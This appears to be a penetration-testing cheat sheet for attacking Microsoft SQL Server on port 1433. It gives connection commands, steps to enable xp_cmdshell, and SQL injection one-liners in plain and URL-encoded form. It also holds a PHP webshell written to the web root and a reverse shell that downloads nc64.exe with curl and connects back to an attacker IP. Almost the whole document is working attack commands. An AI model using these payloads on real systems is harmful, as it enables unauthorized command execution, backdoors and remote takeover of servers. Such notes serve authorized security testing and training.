MSSQL (1433)

1. Basics

Initiate connection

sqsh -S <IP> -U <username> -P "<pass>"
sqsh -S <IP> -U .\\<Username> -P <pass> -D <database>

impacket-mssqlclient :<username>:<pass>@<IP> -windows-auth
impacket-mssqlclient :<username>:<pass>@<IP> -local-auth

2. Reverse Shell

1. Initiate Connection with either mysql or sqsh
    # In sqsh, you need to use GO after writing the query to send it
Do one by one each command:

# Get users that can run xp_cmdshell
    Use master
    EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled
    SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
    sp_configure 'show advanced options', '1'
    RECONFIGURE

# This enables xp_cmdshell
    sp_configure 'xp_cmdshell', '1'
    RECONFIGURE
    EXEC master..xp_cmdshell 'whoami'

Manual Code Execution:

Steps to enable `xp_cmdshell`
    '; EXEC sp_configure "show advanced options", 1; -- //
    '; RECONFIGURE; -- //
    '; EXEC sp_configure "xp_cmdshell", 1; -- //
    '; RECONFIGURE; -- //
        
    '; EXEC xp_cmdshell "whoami"; -- //

Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //

URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F

Payload Example:

Insert webshell into web root directory - 
    "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"
    
Initiating reverse shell with nc64.exe via injected webshell - 
    curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
    c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>

Last updated